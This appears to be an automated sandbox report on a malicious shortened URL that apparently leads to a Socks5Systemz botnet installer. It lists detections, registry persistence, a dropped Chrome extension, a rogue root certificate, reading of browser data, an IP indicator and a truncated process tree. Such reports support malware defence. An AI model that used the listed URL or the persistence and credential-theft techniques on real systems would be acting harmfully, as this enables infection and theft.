Overview (overview): 10
Static (static): 1
URLScan (urlscan): 1
https://ify.ac/1IZk (windows11-21h2-x64): 10
https://ify.ac/1IZk (windows10-1703-x64): 8
https://ify.ac/1IZk (windows10-2004-x64): 10
https://ify.ac/1IZk (windows11-21h2-x64): 10
https://ify.ac/1IZk (android-10-x64): 1
https://ify.ac/1IZk (android-11-x64): 1
https://ify.ac/1IZk (ubuntu-18.04-amd64): 3
https://ify.ac/1IZk (ubuntu-20.04-amd64): 4
https://ify.ac/1IZk (ubuntu-22.04-amd64): 3
https://ify.ac/1IZk (ubuntu-24.04-amd64): 4
Analysis
- max time kernel: 450s
- max time network: 448s
- platform: windows11-21h2_x64
- resource: win11-20240709-en
- resource tags: arch:x64, arch:x86, image:win11-20240709-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 16-07-2024 05:11
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1 | Sample: https://ify.ac/1IZk | Resource: win11-20240709-en
Behavioral task: behavioral2 | Sample: https://ify.ac/1IZk | Resource: win10-20240611-en
Behavioral task: behavioral3 | Sample: https://ify.ac/1IZk | Resource: win10v2004-20240709-en
Behavioral task: behavioral4 | Sample: https://ify.ac/1IZk | Resource: win11-20240709-en
Behavioral task: behavioral5 | Sample: https://ify.ac/1IZk | Resource: android-x64-20240624-en
Behavioral task: behavioral6 | Sample: https://ify.ac/1IZk | Resource: android-x64-arm64-20240624-en
Behavioral task: behavioral7 | Sample: https://ify.ac/1IZk | Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral8 | Sample: https://ify.ac/1IZk | Resource: ubuntu2004-amd64-20240611-en
Behavioral task: behavioral9 | Sample: https://ify.ac/1IZk | Resource: ubuntu2204-amd64-20240522.1-en
Behavioral task: behavioral10 | Sample: https://ify.ac/1IZk | Resource: ubuntu2404-amd64-20240523-en
General
-
Target
https://ify.ac/1IZk
Malware Config
Signatures
-
Detect Socks5Systemz Payload 1 IoCs
Processes:
resource | yara_rule
behavioral1/memory/492-888-0x0000000000BA0000-0x0000000000C42000-memory.dmp | family_socks5systemz
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Blocklisted process makes network request 1 IoCs
Processes: rundll32.exe
flow | pid | process
117 | 5040 | rundll32.exe
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: 2WsCboUrj.exe, rundll32.exe, UzcFeLB.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2WsCboUrj.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | UzcFeLB.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: XPYXLum.exe, OZhxUQi.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\International\Geo\Nation | XPYXLum.exe
Key value queried | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\International\Geo\Nation | OZhxUQi.exe
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description | ioc
Destination IP | 141.98.234.31
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes: setup.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" | setup.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes: XPYXLum.exe, OZhxUQi.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | XPYXLum.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | OZhxUQi.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | XPYXLum.exe
-
Drops desktop.ini file(s) 1 IoCs
Processes: XPYXLum.exe
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | XPYXLum.exe
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: setup.exe, setup.exe
description | ioc | process
File opened (read-only) | \??\D: | setup.exe
File opened (read-only) | \??\F: | setup.exe
File opened (read-only) | \??\D: | setup.exe
File opened (read-only) | \??\F: | setup.exe
-
Drops file in System32 directory 33 IoCs
-
Drops file in Program Files directory 25 IoCs
-
Drops file in Windows directory 9 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
-
NSIS installer 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe | nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe | nsis_installer_2
-
Enumerates system info in registry 2 TTPs 15 IoCs
-
Modifies Control Panel 2 IoCs
Processes: Snetchball.exe, Snetchball.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | Snetchball.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | Snetchball.exe
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 9 IoCs
-
Processes:
setup.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | setup.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob | setup.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob | setup.exe
-
NTFS ADS 1 IoCs
Processes:
msedge.exe
description | ioc | process
File opened for modification | C:\Users\Admin\Downloads\setup_34Uv1hLE7B.zip:Zone.Identifier | msedge.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe schtasks.exe
pid | process
3260 | schtasks.exe
3112 | schtasks.exe
1932 | schtasks.exe
2208 | schtasks.exe
3456 | schtasks.exe
3600 | schtasks.exe
5776 | schtasks.exe
5156 | schtasks.exe
4212 | schtasks.exe
1128 | schtasks.exe
6004 | schtasks.exe
2488 | schtasks.exe
3716 | schtasks.exe
5972 | schtasks.exe
5536 | schtasks.exe
2344 | schtasks.exe
896 | schtasks.exe
5716 | schtasks.exe
4088 | schtasks.exe
1588 | schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exe msedge.exe identity_helper.exe msedge.exe msedge.exe msedge.exe setup_34Uv1hLE7B.tmp djminoradequate.exe msedge.exe powershell.exe powershell.exe powershell.exe 07FQtEghQ.exe powershell.exe powershell.exe powershell.exe powershell.exe powershell.EXE XPYXLum.exe
pid | process
3628 | msedge.exe
3628 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
380 | identity_helper.exe
380 | identity_helper.exe
5164 | msedge.exe
5164 | msedge.exe
3048 | msedge.exe
3048 | msedge.exe
3048 | msedge.exe
3048 | msedge.exe
2084 | msedge.exe
2084 | msedge.exe
6088 | setup_34Uv1hLE7B.tmp
6088 | setup_34Uv1hLE7B.tmp
5828 | djminoradequate.exe
5828 | djminoradequate.exe
5828 | djminoradequate.exe
5828 | djminoradequate.exe
6048 | msedge.exe
4144 | powershell.exe
1868 | powershell.exe
1868 | powershell.exe
4144 | powershell.exe
1868 | powershell.exe
2028 | powershell.exe
2028 | powershell.exe
4144 | powershell.exe
2028 | powershell.exe
3576 | 07FQtEghQ.exe
3576 | 07FQtEghQ.exe
3576 | 07FQtEghQ.exe
3576 | 07FQtEghQ.exe
3576 | 07FQtEghQ.exe
5300 | powershell.exe
5300 | powershell.exe
5300 | powershell.exe
4144 | powershell.exe
4144 | powershell.exe
4144 | powershell.exe
5828 | djminoradequate.exe
5828 | djminoradequate.exe
5828 | djminoradequate.exe
5828 | djminoradequate.exe
4212 | powershell.exe
4212 | powershell.exe
4212 | powershell.exe
3132 | powershell.exe
3132 | powershell.exe
3132 | powershell.exe
2400 | powershell.EXE
2400 | powershell.EXE
2400 | powershell.EXE
2984 | XPYXLum.exe
2984 | XPYXLum.exe
2984 | XPYXLum.exe
2984 | XPYXLum.exe
2984 | XPYXLum.exe
2984 | XPYXLum.exe
2984 | XPYXLum.exe
2984 | XPYXLum.exe
2984 | XPYXLum.exe
2984 | XPYXLum.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs
Processes:
msedge.exe msedge.exe msedge.exe
pid | process
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
2808 | msedge.exe
4116 | msedge.exe
4116 | msedge.exe
4116 | msedge.exe
4116 | msedge.exe
3572 | msedge.exe
3572 | msedge.exe
3572 | msedge.exe
3572 | msedge.exe
3572 | msedge.exe
3572 | msedge.exe
3572 | msedge.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe WMIC.exe powershell.exe powershell.exe powershell.EXE powershell.exe WMIC.exe
description | pid | process
Token: SeDebugPrivilege | 4144 | powershell.exe
Token: SeDebugPrivilege | 1868 | powershell.exe
Token: SeDebugPrivilege | 2028 | powershell.exe
Token: SeDebugPrivilege | 5300 | powershell.exe
Token: SeDebugPrivilege | 4144 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 5456 | WMIC.exe
Token: SeSecurityPrivilege | 5456 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 5456 | WMIC.exe
Token: SeLoadDriverPrivilege | 5456 | WMIC.exe
Token: SeSystemProfilePrivilege | 5456 | WMIC.exe
Token: SeSystemtimePrivilege | 5456 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 5456 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 5456 | WMIC.exe
Token: SeCreatePagefilePrivilege | 5456 | WMIC.exe
Token: SeBackupPrivilege | 5456 | WMIC.exe
Token: SeRestorePrivilege | 5456 | WMIC.exe
Token: SeShutdownPrivilege | 5456 | WMIC.exe
Token: SeDebugPrivilege | 5456 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 5456 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 5456 | WMIC.exe
Token: SeUndockPrivilege | 5456 | WMIC.exe
Token: SeManageVolumePrivilege | 5456 | WMIC.exe
Token: 33 | 5456 | WMIC.exe
Token: 34 | 5456 | WMIC.exe
Token: 35 | 5456 | WMIC.exe
Token: 36 | 5456 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 5456 | WMIC.exe
Token: SeSecurityPrivilege | 5456 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 5456 | WMIC.exe
Token: SeLoadDriverPrivilege | 5456 | WMIC.exe
Token: SeSystemProfilePrivilege | 5456 | WMIC.exe
Token: SeSystemtimePrivilege | 5456 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 5456 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 5456 | WMIC.exe
Token: SeCreatePagefilePrivilege | 5456 | WMIC.exe
Token: SeBackupPrivilege | 5456 | WMIC.exe
Token: SeRestorePrivilege | 5456 | WMIC.exe
Token: SeShutdownPrivilege | 5456 | WMIC.exe
Token: SeDebugPrivilege | 5456 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 5456 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 5456 | WMIC.exe
Token: SeUndockPrivilege | 5456 | WMIC.exe
Token: SeManageVolumePrivilege | 5456 | WMIC.exe
Token: 33 | 5456 | WMIC.exe
Token: 34 | 5456 | WMIC.exe
Token: 35 | 5456 | WMIC.exe
Token: 36 | 5456 | WMIC.exe
Token: SeDebugPrivilege | 4212 | powershell.exe
Token: SeDebugPrivilege | 3132 | powershell.exe
Token: SeDebugPrivilege | 2400 | powershell.EXE
Token: SeDebugPrivilege | 1448 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 2096 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 2096 | WMIC.exe
Token: SeSecurityPrivilege | 2096 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 2096 | WMIC.exe
Token: SeLoadDriverPrivilege | 2096 | WMIC.exe
Token: SeSystemtimePrivilege | 2096 | WMIC.exe
Token: SeBackupPrivilege | 2096 | WMIC.exe
Token: SeRestorePrivilege | 2096 | WMIC.exe
Token: SeShutdownPrivilege | 2096 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 2096 | WMIC.exe
Token: SeUndockPrivilege | 2096 | WMIC.exe
Token: SeManageVolumePrivilege | 2096 | WMIC.exe
Token: SeAssignPrimaryTokenPrivilege | 2096 | WMIC.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exesetup_34Uv1hLE7B.tmpTVCwEHwXmrhkdZhEKh.tmpmsedge.exepid process 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 6088 setup_34Uv1hLE7B.tmp 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 5208 TVCwEHwXmrhkdZhEKh.tmp 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe -
Suspicious use of SendNotifyMessage 56 IoCs
Processes:
msedge.exemsedge.exemsedge.exepid process 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 2808 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 4116 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe 3572 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MiniSearchHost.exe
pid | process
1432 | MiniSearchHost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2808 wrote to memory of 5788 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 5788 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 
3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3516 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3628 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 3628 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe PID 2808 wrote to memory of 2120 2808 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1IZk
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2808
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd8
2⤵
PID:5788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
2⤵
PID:3516
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3628
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
2⤵
PID:2120
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1888 /prefetch:1
2⤵
PID:5876
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
2⤵
PID:2200
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:380
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5164
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
2⤵
PID:1800
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
2⤵
PID:4908
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
2⤵
PID:5888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
2⤵
PID:976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5976 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3048
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
2⤵
PID:1936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
2⤵
PID:5396
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
